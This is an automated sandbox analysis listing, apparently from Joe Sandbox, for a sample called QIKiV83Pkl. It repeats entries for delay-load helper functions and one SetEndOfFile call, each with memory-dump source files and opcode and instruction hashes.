                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7c1f150914a4ac2170db185a8f80bb64152e87d71031bc6fc1c1607090c5bcb9
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: 7c1f150914a4ac2170db185a8f80bb64152e87d71031bc6fc1c1607090c5bcb9
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f6f8b09a3fc5234c2e2dff795dce9b1e1eee8ba0ae48122c1787f260c7fbf2b9
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: f6f8b09a3fc5234c2e2dff795dce9b1e1eee8ba0ae48122c1787f260c7fbf2b9
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a2c9f54480bd881c3e6b4ea214503dc27083fc56e20ed63016d2a7f8d56f6a93
                • Instruction ID: 8f684fe849f8c4f0fa0435bb629d80360f16e35c95724e63121fe6be2c49c957
                • Opcode Fuzzy Hash: a2c9f54480bd881c3e6b4ea214503dc27083fc56e20ed63016d2a7f8d56f6a93
                • Instruction Fuzzy Hash: A3A0129116C2027C300831106C02C36031CE4C2B503304819B106D00C198401C041531
                Function 0088DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 95f3c4cfe85bd14d01e7f495294b5968a241132cedc50896da07adee5af870c5
                • Instruction ID: 7d2ee66353ef50660069516cf4a55b60b4ca4539dcb9f9b29b61625d835e022a
                • Opcode Fuzzy Hash: 95f3c4cfe85bd14d01e7f495294b5968a241132cedc50896da07adee5af870c5
                • Instruction Fuzzy Hash: C1A011A22AC2023C300CB202AE02C3A032CF0C0BA2330820AB00AE00CAA88808082A32
                Function 0088DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5b4cbec4950156b8ede51f7840b69f9bbe47f22a60eadc3dc55af23d682497f8
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: 5b4cbec4950156b8ede51f7840b69f9bbe47f22a60eadc3dc55af23d682497f8
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                Function 0088DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fcf21bc41aede944e138f1457e0c8d597d2430fa791eb4bcac7cd64f0b46e8f6
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: fcf21bc41aede944e138f1457e0c8d597d2430fa791eb4bcac7cd64f0b46e8f6
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                Function 0088DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0a684ce2c3edaff8fbec15c02d96e9211104f41710849b162c0012fef398fdf7
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: 0a684ce2c3edaff8fbec15c02d96e9211104f41710849b162c0012fef398fdf7
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                Function 0088DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d9c92d2b98c16bc03de225d89a7737b3b86e20bc6fbc5dee4fa1e7140efd9ee5
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: d9c92d2b98c16bc03de225d89a7737b3b86e20bc6fbc5dee4fa1e7140efd9ee5
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                Function 0088DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 65567b9bd3dc4b08bd7b72ba1bce4f25c3b423909e25db972edfbbb322be8baa
                • Instruction ID: d783e9a341688abbe1345c655c71c45f2295361605ed21274313c8a63bd63420
                • Opcode Fuzzy Hash: 65567b9bd3dc4b08bd7b72ba1bce4f25c3b423909e25db972edfbbb322be8baa
                • Instruction Fuzzy Hash: 33A001A62AD216BC310C7256AE16D3A076CE4C5BA53308A1AB51AD45CAA98858496A32
                Function 0088DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 396ed1a3e7cd397c963b80ed04194a99b8d433ed73dda1b5ba04adb45c7188d1
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: 396ed1a3e7cd397c963b80ed04194a99b8d433ed73dda1b5ba04adb45c7188d1
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                Function 0088DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9d56bd61b43cec342de92722839909d3aae85d6bcbdc47d13b6b8eccd0598d8f
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: 9d56bd61b43cec342de92722839909d3aae85d6bcbdc47d13b6b8eccd0598d8f
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                Function 0088DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4f75796cd4381c9e73929b05bf995b13fa9a2e96e6aafefe5c82c5238ee865d8
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: 4f75796cd4381c9e73929b05bf995b13fa9a2e96e6aafefe5c82c5238ee865d8
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                Function 0088DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: afedfcfa2af5bfb018a0899341a24d2011e4d05e874a6d31f183e458e3e5dcf7
                • Instruction ID: 2a9aaf7ae5993c1fb96bb57cfb0bb4b468b053ce04aee3cd340cf862393cd97d
                • Opcode Fuzzy Hash: afedfcfa2af5bfb018a0899341a24d2011e4d05e874a6d31f183e458e3e5dcf7
                • Instruction Fuzzy Hash: C1A011AA2AC20ABC300832002C0BC3A032CF0C0B30330880AB20BC00C2AE800C0A2232
                Function 0088DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 48167afae77c642e8def3ac1b1de55ab39e5b991c40846d8cb7762ae9ac5292c
                • Instruction ID: 90c2293cbbc830f25e24284b8ded51f11cfcd97d850d56bd19b6f6aad17b3c01
                • Opcode Fuzzy Hash: 48167afae77c642e8def3ac1b1de55ab39e5b991c40846d8cb7762ae9ac5292c
                • Instruction Fuzzy Hash: 9DA011AA2AC302BC300C32002C22C3A032CE0C0B20330880AF20AE02C2AA802C08A232
                Function 0088DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4b6478b6f0d978f0eb83f3ab234d2f2b531f198e00b7a22bb13b8ac8d6cf3081
                • Instruction ID: 90c2293cbbc830f25e24284b8ded51f11cfcd97d850d56bd19b6f6aad17b3c01
                • Opcode Fuzzy Hash: 4b6478b6f0d978f0eb83f3ab234d2f2b531f198e00b7a22bb13b8ac8d6cf3081
                • Instruction Fuzzy Hash: 9DA011AA2AC302BC300C32002C22C3A032CE0C0B20330880AF20AE02C2AA802C08A232
                Function 00879EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                Download Yara Rule
                APIs
                • SetEndOfFile.KERNELBASE(?,00879104,?,?,-00001964), ref: 00879EC2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
